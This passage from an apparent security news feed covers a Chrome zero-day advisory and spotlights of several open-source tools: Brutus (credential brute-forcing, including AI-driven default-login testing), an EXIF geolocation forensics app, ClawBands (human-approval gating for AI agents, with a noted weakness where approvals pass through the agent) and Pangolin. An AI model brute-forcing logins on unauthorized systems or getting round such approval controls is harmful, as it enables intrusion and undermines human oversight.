Kong Computer Emergency Response Team (HKCERT) classified this vulnerability as "Extremely High Risk" in an advisory issued on February 16, 2026. Browser-based vulnerabilities remain a high-value target for threat actors due to the ubiquity of web browsers and the broad attack surface they expose. Chrome processes untrusted web content continuously — every script, stylesheet, and image is parsed in real time — making memory safety issues in rendering components particularly dangerous. ## References - [Google Chrome Stable Channel Update — February 13, 2026](https://chromereleases.googleblog.com/) - [NVD — CVE-2026-2441](https://nvd.nist.gov/vuln/detail/CVE-2026-2441) - [Help Net Security — Google patches Chrome vulnerability with in-the-wild exploit](https://www.helpnetsecurity.com/2026/02/16/google-patches-chrome-vulnerability-with-in-the-wild-exploit-cve-2026-2441/) - [The Cyber Express — Chrome RCE Flaw CVE-2026-2441 Exploited in Wild](https://thecyberexpress.com/cve-2026-2441-google-chrome/) - [The Hacker News — New Chrome Zero-Day Under Active Attack](https://thehackernews.com/2026/02/new-chrome-zero-day-cve-2026-2441-under.html) ### Brutus: Praetorian's Zero-Dependency Credential Testing Tool Takes Aim at Hydra URL: https://darkwebinformer.com/brutus-praetorians-zero-dependency-credential-testing-tool-takes-aim-at-hydra/ Last updated: 2026-02-15T17:35:39.000Z Tool Spotlight Credential Testing Open Source Feb 14, 2026 # Brutus: Praetorian's Zero-Dependency Credential Testing Tool Takes Aim at Hydra A modern, single-binary alternative to THC Hydra and Medusa written in pure Go. Supports 23 protocols, embeds known-bad SSH keys, and pipes directly into fingerprintx/naabu reconnaissance workflows. praetorian-inc / brutus Fast, zero-dependency credential testing tool in Go. Brute force SSH, MySQL, PostgreSQL, Redis, MongoDB, SMB, and 20+ protocols. Hydra alternative with native fingerprintx/naabu pipeline integration. Go ★ 10 stars 1 fork 75 commits 4 contributors Apache-2.0 Praetorian, the offensive security firm behind tools like fingerprintx, Gato-X, and the Chariot attack surface management platform, has open-sourced **Brutus**, a multi-protocol credential testing tool written in pure Go. The tool was authored by Adam Crosser, a Staff Security Engineer on Praetorian's red team, and was built to solve a problem every pentester knows: credential testing at scale is tedious with the current tooling. Tools like THC Hydra and Medusa have been the go-to options for years, but they come with friction. Complex dependency chains that break across platforms, compilation headaches on jump boxes, inconsistent output formats, and zero native integration with modern JSON-based recon pipelines. Brutus addresses all of this by shipping as a single binary with no external dependencies. ## // What Is Brutus? Brutus is a credential testing tool that supports **23 protocols** out of the box: SSH, MySQL, PostgreSQL, MSSQL, Redis, MongoDB, SMB, LDAP, WinRM, SNMP, HTTP Basic Auth, and more. It's designed around a library-first architecture, meaning you can import it directly into your own Go security tools without shelling out to external processes. The core workflow is straightforward: you feed Brutus a target, a protocol, and credentials, and it tells you what works. Where it gets interesting is how it fits into modern offensive pipelines. Brutus natively consumes JSON output from Praetorian's fingerprintx (service identification) and naabu (port scanning) tools, allowing operators to chain an entire network credential audit into a single pipeline. Discovery | naabu scans ports across target ranges Identification | fingerprintx identifies services on open ports Testing | Brutus tests credentials against identified services Output | JSON results for integration with existing tooling ## // Key Features 📦 Zero Dependencies Single binary. No libssh-dev, no libmysqlclient-dev, no compilation. Download and run on Linux, macOS, or Windows. 🔗 Pipeline Native JSON input/output. Pipes directly from naabu and fingerprintx. No format conversion or glue scripts needed. 🔑 Embedded Bad SSH Keys Rapid7 ssh-badkeys and Vagrant key collections compiled into the binary. Automatic testing against every SSH target. 🤖 Experimental AI Integration Uses Claude's vision API with headless Chrome to identify web admin panels and test default credentials automatically. 📚 Library-First Design Import Brutus as a Go package directly into custom security tools. Build automation without shelling out to external processes. 🛡️ CVE Tracking Each embedded bad key is paired with its default username and tracked by CVE where applicable, enabling compliance queries. ## // Supported Protocols | Category | Protocols | | ---------------- | ----------------------------------------------------------- | | Remote Access | SSH, WinRM, Telnet, VNC | | Databases | MySQL, PostgreSQL, MSSQL, Redis, MongoDB, Cassandra, Oracle | | Directory / Auth | LDAP, SNMP, HTTP Basic Auth | | File Sharing | SMB, FTP | | Web | HTTP Basic Auth, HTTP Form (experimental via AI) | RDP is notably absent. According to Praetorian, the team built an RDP implementation using Rust FFI but pulled it because it wasn't reliable enough to ship. They chose to maintain the core promise that everything in the tool works correctly rather than ship a broken protocol. RDP support with NLA detection and Sticky Keys backdoor testing remains the top priority on the roadmap. ## // Embedded SSH Bad Keys One of Brutus's most practical features is the embedded SSH bad key testing. The binary carries known-compromised SSH key collections from the Rapid7 ssh-badkeys repository and HashiCorp Vagrant, compiled directly in with no external key files to manage. When Brutus encounters an SSH service, it automatically tests every embedded bad key against the target. Each key is paired with its expected default username: `root` for F5 BIG-IP, `vagrant` for Vagrant boxes, `mateidu` for Ceragon FibeAir, and so on. Vendor coverage includes F5 BIG-IP, ExaGrid, Barracuda, Ceragon, and Array Networks, among others. 🔑 Why This Matters On internal assessments, operators know there are Vagrant boxes or appliances running factory keys somewhere in the environment, but testing for them comprehensively has always been tedious enough to get deprioritized. With Brutus, it happens automatically as part of the normal workflow. What used to be a half-day side project now comes for free. ## // Experimental AI Features Brutus includes two experimental AI-powered features that tackle a problem with no good automated solution: unidentified web admin panels. **LLM-based credential suggestion.** When Brutus encounters an HTTP service, it captures the response data (headers, page content, server signatures) and sends it to an LLM for analysis. The model identifies the application (Grafana, Jenkins, Tomcat, a Cisco management interface, etc.) and suggests vendor-specific default credentials. These are tested first, with Brutus falling back to generic wordlists if they don't succeed. **Vision-based admin panel testing.** Using Claude's vision capabilities paired with headless Chrome, Brutus renders login pages, uses AI vision to identify the appliance or application, researches likely default credentials, then controls the browser to fill in the login form and test them. This approach handles JavaScript-rendered forms, CSRF tokens, and multi-step logins, all the things that break traditional form-filling tools. Both features are experimental and depend on external API services. ## // Pipeline Usage The core value proposition is how Brutus fits into existing offensive workflows. A full network credential audit can be expressed as a single pipeline: naabu → fingerprintx → brutus → JSON output Installation is a single command via `go install` or a direct binary download for Linux, macOS (Intel and Apple Silicon), and Windows. No compilation required. ## // About the Name Praetorian typically names their tools after Roman emperors (Trajan, Augustus, etc.). Brutus breaks that convention because Marcus Junius Brutus was never an emperor. As Praetorian puts it: Brutus doesn't build empires; it tests whether the ones you've built will let a stranger walk right through the front door. ## // Bottom Line Brutus fills a real gap in the offensive security toolkit. Legacy credential testing tools have lagged behind the rest of the modern pentest workflow, and a zero-dependency, pipeline-native alternative from a team that uses it on real engagements is a welcome addition. The embedded SSH bad key testing alone makes it worth adding to your toolkit, and the experimental AI features hint at where credential testing is headed. The tool is open source under the Apache-2.0 license. Praetorian is actively seeking community contributions, particularly additional SSH bad keys from appliances and vendor products encountered in the wild. [ GitHub Repository](https://github.com/praetorian-inc/brutus) [ Praetorian Blog Post](https://www.praetorian.com/blog/et-tu-default-creds-introducing-brutus-for-modern-credential-testing/) This post is for informational purposes only. Always ensure you have proper authorization before conducting any credential testing. Unauthorized access to computer systems is illegal. ### Refloow Geo Forensics: A Free Batch Image Geolocation and EXIF Forensics Tool for OSINT URL: https://darkwebinformer.com/refloow-geo-forensics-a-free-batch-image-geolocation-and-exif-forensics-tool-for-osint/ Last updated: 2026-02-15T00:13:18.000Z Tool Spotlight OSINT / Forensics Open Source Feb 15, 2026 # Refloow Geo Forensics: A Free Batch Image Geolocation and EXIF Forensics Tool for OSINT An open-source Electron desktop app that extracts EXIF metadata from batches of JPG images, plots GPS coordinates on interactive maps, and reconstructs chronological event timelines. Runs locally with zero data uploads. Refloow / Refloow-Geo-Forensics Free batch image geolocation and digital forensics tool. Automatically extract .jpg EXIF data, visualize GPS coordinates on maps, and reconstruct event timelines for OSINT. JavaScript 67.6% HTML 19.7% CSS 9.2% ★ 17 stars v1.0.0 AGPL-3.0 3 forks 21 commits **Refloow Geo Forensics** is a new open-source digital forensics tool by developer Veljko Vuckovic (Refloow) that targets a specific, practical need in the OSINT and investigation workflow: batch extraction of EXIF metadata from image files, with built-in geospatial visualization and timeline reconstruction. The tool is built with Electron for cross-platform desktop support and runs entirely locally. No image data or metadata is uploaded to external servers, which is a critical requirement for investigators handling sensitive evidence or conducting privacy-conscious OSINT work. ## // What It Does The core workflow is straightforward: point the tool at a directory of `.jpg` or `.jpeg` files, and it automatically parses the EXIF headers from every image in the batch. It extracts GPS coordinates, camera model information, and timestamps, then presents the results across three views. Select directory → Batch EXIF extraction → GPS + timestamp parsing → Map view + Timeline ![Refloow GeoForensics map view showing GPS-plotted image evidence with movement tracking lines and EXIF metadata popup](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/7983257623597862379865293874.png) ## // Key Features 📸 Batch EXIF Extraction Process hundreds of JPG/JPEG files simultaneously. Pulls GPS coordinates, camera model, timestamps, and deep metadata from EXIF headers. 🗺️ Geospatial Visualization Automatically plots extracted GPS coordinates onto interactive maps, showing geographical clusters of where photos were taken. ⏱️ Timeline Reconstruction Generates a chronological flow of events based on image timestamps. Useful for tracking movement patterns or verifying alibis. 🔒 Privacy-First / Local Only Everything runs on your machine. No data is uploaded to external servers. Critical for investigators handling sensitive evidence. ## // Technical Details | Spec | Details | | ----------------- | ------------------------------------------------------------------- | | Framework | Electron (cross-platform desktop) | | Runtime | Node.js v20.10.0+ | | Core Libraries | express, exif-parser, electron | | Platforms | Windows 10/11, macOS (Intel + Apple Silicon), Linux (Ubuntu/Debian) | | Min. RAM | 2 GB (4 GB+ recommended for large batches) | | Install Size | \~350 MB | | Supported Formats | .jpg, .jpeg | ## // Use Cases 🔍 OSINT & Investigations Digital forensic examiners, OSINT analysts, law enforcement, and journalists can use this tool to quickly process seized or collected image evidence. Batch processing hundreds of images and seeing them plotted on a map with a timeline view is significantly faster than examining files one at a time with command-line tools like exiftool. **Incident reconstruction.** If you have a set of photos from a crime scene, protest, accident, or event, the timeline reconstruction feature lets you see the chronological sequence of when images were captured and where, helping establish a narrative of what happened. **Privacy auditing.** Security-conscious individuals and organizations can use the tool to audit their own image collections for embedded GPS data before sharing or publishing photos. Many people don't realize their phone photos contain precise location coordinates in the EXIF data. **Journalism.** Verifying the authenticity and origin of photos submitted as news tips or evidence. Checking whether the GPS coordinates and timestamps in an image's metadata are consistent with the claimed story. ## // Considerations ⚠️ Early Stage Project Refloow Geo Forensics is at v1.0.0, released February 12, 2026\. It currently has 11 open issues on GitHub. Evaluate accordingly for your use case. **JPG/JPEG only.** The tool currently only processes `.jpg` and `.jpeg` files. Other common image formats like PNG, HEIC (used by iPhones), TIFF, or RAW camera formats are not supported. This is a meaningful limitation for investigators who may receive evidence in mixed formats. **EXIF dependency.** The tool can only work with what's in the EXIF data. Many social media platforms (Twitter/X, Facebook, Instagram) strip EXIF metadata from uploaded images. Photos that have been screenshotted, re-saved, or processed through messaging apps typically lose their EXIF data as well. **Electron overhead.** The \~350 MB install size is a consequence of Electron bundling a Chromium runtime. This is typical for Electron apps but worth noting compared to lightweight command-line alternatives like exiftool. **AGPL-3.0 license.** The tool is licensed under the GNU Affero General Public License v3.0, which requires that any modifications to the source code be released under the same license. This is more restrictive than MIT/Apache and worth understanding if you plan to incorporate it into other projects. ## // Bottom Line Refloow Geo Forensics fills a niche for investigators and OSINT practitioners who need a quick, visual way to process batches of geotagged images without uploading anything to the cloud. The combination of batch EXIF extraction, interactive map visualization, and timeline reconstruction in a single desktop app makes it a useful addition to the OSINT toolkit, even at this early stage. The JPG-only limitation and Electron overhead are real constraints, but for the specific use case of "I have a folder of JPGs and I need to see where and when they were taken," this tool gets the job done with minimal friction. It's worth watching as the project matures and expands format support. [ GitHub Repository](https://github.com/Refloow/Refloow-Geo-Forensics) [ Refloow Website](https://refloow.com) This tool is intended for legitimate forensic investigation, OSINT research, and privacy auditing purposes. Always ensure you have proper authorization before analyzing images that belong to others. ### ClawBands: A Security Middleware That Puts Human-in-the-Loop Controls on OpenClaw AI Agents URL: https://darkwebinformer.com/clawbands-a-security-middleware-that-puts-human-in-the-loop-controls-on-openclaw-ai-agents/ Last updated: 2026-02-15T00:14:04.000Z Tool Spotlight AI Safety Open Source Feb 14, 2026 # ClawBands: A Security Middleware That Puts Human-in-the-Loop Controls on OpenClaw AI Agents A lightweight TypeScript plugin that hooks into OpenClaw's tool execution pipeline, enforcing approval workflows before your AI agent can write files, run shell commands, or make network requests. Think `sudo` for your AI agent. SeyZ / clawbands ClawBands is a security middleware for OpenClaw AI agents. TypeScript 98% ★ 95 stars v1.0.0 MIT 8 forks 2 commits OpenClaw has exploded in popularity as a personal AI assistant platform, with over 150,000 GitHub stars and coverage from Fortune, IBM, and VentureBeat. But as Fortune recently highlighted, giving an AI agent the ability to execute shell commands, modify files, and access your APIs creates real security risks: data exfiltration, unintended command execution, and prompt injection attacks. **ClawBands** is a new open-source project by **SeyZ** that directly addresses this problem. It's a security middleware that hooks into OpenClaw's `before_tool_call` plugin event, intercepting every tool execution and enforcing human approval before dangerous actions run. The agent literally pauses and waits for your decision before proceeding. ## // The Problem It Solves OS-level isolation (containers, VMs) protects your host machine from a rogue AI agent. But it doesn't protect the services your agent already has access to: your GitHub repos, your APIs, your file system, your smart home devices. If an agent gets hijacked via prompt injection or simply makes a bad decision, it can do real damage within its authorized scope. ClawBands sits between the agent's intent and the actual execution. Every tool call passes through a policy engine that decides whether to allow it immediately, block it outright, or pause and ask a human. Nothing executes without passing through this gate. ## // How It Works Agent calls tool → before\_tool\_call hook → Policy check → ALLOW / ASK / DENY → Execute or block The plugin registers with OpenClaw's event system and intercepts every tool call before execution. It maps each tool to a module (FileSystem, Shell, Network, Browser, Gateway) and applies a configurable security policy. In terminal mode, you get an interactive prompt. On messaging channels (WhatsApp, Telegram), the agent sends you a YES/NO question and waits for your response via a dedicated `clawbands_respond` tool. ## // Key Features 🔒 Synchronous Blocking Agent fully pauses until you approve or reject. No race conditions, no background execution while waiting. ⚙️ Granular Policies Three decision types: ALLOW (auto-approve reads), ASK (prompt on writes), DENY (block deletes). Fully configurable per module. 💬 Multi-Channel Support Works in terminal (interactive prompt), WhatsApp, and Telegram via the clawbands\_respond tool registered through OpenClaw's API. 📊 Immutable Audit Trail Every decision logged in append-only JSON Lines format. Full history with timestamps, modules, methods, and response times. ⚡ Zero Latency Runs entirely in-process with no external API calls. The only delay is the time it takes you to make a decision. 🛡️ Fail-Secure Default Any unmapped or unknown tool defaults to ASK. The agent can never silently execute an action that isn't explicitly allowed by policy. ## // Security Policies | Policy | Behavior | | ------ | ----------------------------------------------------------------------------- | | ALLOW | Execute immediately with no prompt (e.g., file reads, glob) | | ASK | Pause agent and prompt for human approval (e.g., file writes, shell commands) | | DENY | Block automatically with no option to override (e.g., file deletes) | The default "Balanced" policy allows file reads, asks on writes and shell commands, and denies file deletes. Network requests (fetch, download, webhook) default to ASK. Everything unmapped defaults to ASK, which is a sensible fail-secure approach. ## // Protected Tool Categories | Module | Tools Intercepted | | ---------- | ------------------------------------------- | | FileSystem | read, write, edit, glob | | Shell | bash, exec | | Browser | navigate, screenshot, click, type, evaluate | | Network | fetch, request, webhook, download | | Gateway | listSessions, listNodes, sendMessage | ## // Architecture Plugin Layer | Hook registration, before\_tool\_call handler, clawbands\_respond intercept Core Engine | Interceptor (policy evaluation), Arbitrator (TTY prompt / channel queue) Approval Queue | In-memory approval state for async channel mode (WhatsApp, Telegram) Storage | PolicyStore, DecisionLog (JSONL), StatsTracker, Winston logging CLI | init, policy, stats, audit, reset, enable/disable commands ## // Why This Matters Right Now 🔑 Context Fortune, Bitsight, and Calcalist Tech have all published pieces in the past week about security risks in OpenClaw deployments. The concerns are real: prompt injection, data exfiltration, unintended command execution. ClawBands is one of the first open-source tools to offer a concrete, pluggable solution. The core insight behind ClawBands is that container-level isolation isn't enough for AI agents. An agent running inside a Docker container is still dangerous if it has API keys, database credentials, or access to messaging platforms. The threat model isn't "agent escapes the sandbox" but rather "agent does something harmful within its authorized scope." By intercepting at the tool-call level rather than the OS level, ClawBands provides defense-in-depth that complements existing containerization. The agent can still do everything it's supposed to do, but every sensitive action requires explicit human approval. ## // Considerations ⚠️ Early Stage ClawBands is at v1.0.0 with only 2 commits. This is a brand new project. Evaluate accordingly before deploying in any production or sensitive environment. **OpenClaw-specific.** ClawBands is built exclusively for OpenClaw's plugin system. It hooks into the `before_tool_call` event and the `api.registerTool()` API. It won't work with other AI agent frameworks without modification. **Human bottleneck.** The synchronous blocking model means the agent stops entirely when it hits an ASK policy. If you're running an agent that needs to execute dozens of write operations, you'll be approving each one individually. This is by design (security over convenience), but it's worth understanding the workflow implications. **Channel mode trust model.** In WhatsApp/Telegram mode, the agent relays your approval decision via the `clawbands_respond` tool. This means the approval flow passes through the agent itself, which is worth considering from a security perspective. ## // Bottom Line ClawBands fills a gap that the OpenClaw ecosystem clearly needs. As AI agents get more capable and more people deploy them with access to real infrastructure, the question of "what happens when the agent does something you didn't intend" becomes urgent. ClawBands offers a straightforward answer: nothing happens without your explicit permission. It's early days for this project, but the approach is sound. A lightweight, in-process middleware that enforces human-in-the-loop approval with granular policies and a full audit trail is exactly the kind of tooling the AI agent ecosystem needs as it matures. If you're running OpenClaw in any environment where the agent has access to sensitive resources, this is worth installing. [ GitHub Repository](https://github.com/SeyZ/clawbands) [ OpenClaw (Parent Project)](https://github.com/openclaw/openclaw) ClawBands is an independent open-source project. It is not officially affiliated with or endorsed by the OpenClaw project. ### Pangolin: The Self-Hosted Tunneled Reverse Proxy That's Quietly Replacing Cloudflare Tunnels URL: https://darkwebinformer.com/pangolin-the-self-hosted-tunneled-reverse-proxy-thats-quietly-replacing-cloudflare-tunnels/ Last updated: 2026-02-14T17:09:46.000Z Tool Spotlight Self-Hosted Open Source Feb 14, 2026 # Pangolin: The Self-Hosted Tunneled Reverse Proxy That's Quietly Replacing Cloudflare Tunnels An identity-aware reverse proxy built on WireGuard that connects isolated networks through encrypted tunnels, with a dashboard UI, SSO/OIDC support, and zero-trust access controls. Nearly 19k GitHub stars and growing fast. fosrl / pangolin Identity-Aware Tunneled Reverse Proxy Server with Dashboard UI TypeScript 98% Go 1% ★ 18.8k stars 565 forks 55 watching 79 contributors 4,785 commits AGPL-3.0 **Pangolin** is a self-hosted, identity-based remote access platform built on WireGuard that has rapidly become one of the most popular self-hosted projects in the homelab and infrastructure space. Developed by Fossorial (a YC 2025 company), Pangolin combines reverse proxy and VPN capabilities into a single platform, providing browser-based access to web applications and client-based access to private resources, all with zero-trust security and granular access controls. The pitch is straightforward: think self-hosted Cloudflare Tunnels, but with full control over your infrastructure. Pangolin acts as a central hub, connecting isolated networks (even those behind restrictive firewalls) through encrypted WireGuard tunnels. No open ports, no VPN configuration headaches. ## // How It Works The Pangolin ecosystem consists of three core components that work together: Pangolin | Central management server with dashboard UI, identity/access control, and resource configuration Newt | Lightweight WireGuard tunnel client (runs in userspace, no root required) that connects remote sites Gerbil | WireGuard interface management server written in Go that handles tunnel creation and peer management Traefik | Integrated reverse proxy and load balancer handling routing, SSL certificates, and traffic management The workflow is simple: install Pangolin on a VPS with a public IP, deploy the lightweight Newt client on any machine behind a firewall, and Pangolin handles the rest. Traffic is routed through encrypted WireGuard tunnels to reach services on private networks. Traefik handles reverse proxying, load balancing, health checking, and automatic Let's Encrypt SSL certificates. 🦎 Naming Convention All tools in the Fossorial ecosystem are named after fossorial animals (animals that burrow/dig), because that's essentially what these tools do: dig tunnels through networks. The company's GitHub org is literally "fosrl." ## // Key Features 🌐 Tunneled Reverse Proxy Route traffic via encrypted WireGuard tunnels to any private network. Handles routing, load balancing, health checking, and automatic SSL. 🔐 Identity-Aware Access Control SSO, OIDC, PIN authentication, passwords, temporary share links, geolocation rules, and IP-based restrictions. 🖥️ Dashboard UI Unified management interface to monitor, configure, and secure all services regardless of where they're hosted. 🔒 Private Resource Access Access SSH, databases, RDP, and entire network ranges through Pangolin clients on Windows, macOS, and Linux. 🪶 Lightweight Site Connector Newt runs in userspace with no root/sudo required. Deploy via Docker or standalone binary on any machine, including Raspberry Pi. 🛡️ CrowdSec Integration Reputation-based threat blocking at the edge by ingesting Traefik logs. Defense-in-depth with private origins kept dark. ## // Traffic Flow User / Browser → Pangolin (VPS) → Traefik (SSL + Routing) → WireGuard Tunnel → Newt (Private Network) → Backend Service ## // Deployment Options The dashboard provides centralized management for all connected sites, showing real-time status, data throughput, and Newt client versions across your entire infrastructure. ![Pangolin Dashboard - Manage Sites](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/pangolin_23879057823578662395872.png) | Option | Details | | ------------------------ | ------------------------------------------------------------------------------------------------------- | | Community Edition | Free, open source, AGPL-3.0 licensed. Full self-hosted deployment. | | Enterprise Edition | Fossorial Commercial License. Free for personal/hobbyist use and businesses under $100K USD annually. | | Pangolin Cloud | Fully managed service with pay-as-you-go pricing. Free tier: 25GB bandwidth, 3 users, 1 site, 1 domain. | | DigitalOcean Marketplace | One-click pre-configured installer for quick VPS deployment. | ## // Recent Development: Private Resource Access A major recent update transformed Pangolin from a tunneled reverse proxy into a fully self-hosted alternative to Twingate. The update introduced private resource access via user clients, effectively turning Pangolin into a zero-trust network access (ZTNA) platform. **What changed:** Newt still acts as the site connector, establishing secure WireGuard tunnels. But now, Pangolin clients (available on Windows, macOS, and Linux) can connect to the private network and access defined resources using familiar LAN-style addresses. This flattens the network topology: once connected, resources across all sites are accessible without connecting to each individual site. **DNS over tunnel:** Pangolin clients now support routing DNS queries through the secure tunnel. Configure a self-hosted or private DNS server, and all resolution happens within your private infrastructure rather than leaking to the local network. Private resources are managed through the dashboard, where each resource is mapped to a site, destination (host or CIDR), and optional DNS alias for friendly access. ![Pangolin Dashboard - Manage Private Resources](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/pangolin_23879057823578662395873.png) ## // The Ecosystem | Component | Description | | -------------- | ------------------------------------------------------------------------------------------------------ | | Pangolin | Central server: dashboard UI, identity management, resource configuration, access control (TypeScript) | | Newt | Lightweight site connector: userspace WireGuard tunnel client and TCP/UDP proxy (Go, 693 stars) | | Gerbil | WireGuard interface management server with HTTP API for tunnel lifecycle (Go, 249 stars) | | Android Client | Pangolin VPN client for Android devices (Kotlin) | | Pangolin Node | Remote node for connecting self-hosted infrastructure to the Pangolin Cloud control plane (TypeScript) | ## // Why It's Gaining Traction Connected user devices are visible at a glance, with per-client data usage, connectivity status, and agent versions tracked across macOS, Windows, iOS, and Android clients. ![Pangolin Dashboard - User Devices](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/pangolin_23879057823578662395874.png) Pangolin has hit nearly 19,000 GitHub stars because it solves a specific, widespread pain point cleanly. Homelabbers and small teams need to expose services securely without the complexity of manual WireGuard configuration, Nginx reverse proxy rules, or reliance on Cloudflare's proprietary tunnels. **Setup is genuinely simple.** The installer handles Pangolin, Gerbil, Traefik, and Let's Encrypt configuration. Deploying Newt on a remote machine is a single Docker container or binary with three environment variables. The dashboard UI makes resource and user management accessible without touching config files. **It's a real company backing it.** Fossorial is a Y Combinator 2025 company, which means there's sustained development and a viable business model behind the open-source project. The dual AGPL-3.0 / commercial license keeps the community edition fully functional while the enterprise and cloud tiers fund continued development. **Platform coverage is broad.** Newt runs on Linux (including ARM/Raspberry Pi), macOS, and Windows. Native clients exist for Windows, macOS, Linux, and Android. The DigitalOcean marketplace listing provides one-click deployment for users who want to skip manual server setup. ## // Considerations ⚠️ Licensing Nuance The Community Edition is AGPL-3.0, which has specific requirements around source code distribution if you modify and distribute the software. The Enterprise Edition is free for personal use and businesses under $100K USD annually, but requires a commercial license above that threshold. **Performance.** Newt's userspace WireGuard implementation is less performant than the kernel WireGuard client, though Newt does support a flag to use the kernel implementation. For most homelab and small business use cases, the userspace client is more than adequate. **Private access is still maturing.** The client-based private resource access feature is relatively new and still in active development. The team notes that the migration from the older client resources model should be reviewed after updating, and they recommend backing up configuration before upgrades. **Requires a public VPS.** Unlike pure mesh VPN solutions (Tailscale, ZeroTier), Pangolin requires a server with a public IP to act as the central hub. This is a deliberate architectural choice for the reverse proxy use case, but it means you need infrastructure beyond just the machines you're connecting. ## // Bottom Line Pangolin has quickly established itself as the leading open-source alternative to Cloudflare Tunnels for self-hosters. It combines a tunneled reverse proxy, zero-trust access controls, and a clean dashboard UI into a single deployable stack. The recent addition of private resource access via native clients pushes it into Twingate/Tailscale territory, making it a genuinely comprehensive remote access platform. With 18.8k stars, 79 contributors, 49 releases, and YC backing, this isn't a weekend project. It's production infrastructure that's actively maintained and growing. If you're currently relying on Cloudflare Tunnels, manually configuring WireGuard + Nginx, or paying for Tailscale/Twingate, Pangolin is worth evaluating. [ GitHub Repository](https://github.com/fosrl/pangolin) [ Documentation](https://docs.pangolin.net/) Pangolin is dual licensed under AGPL-3.0 and the Fossorial Commercial License. WireGuard is a registered trademark of Jason A. Donenfeld. _Includes the latest 500 public posts. Use `/sitemap.xml` for the complete archive of public content._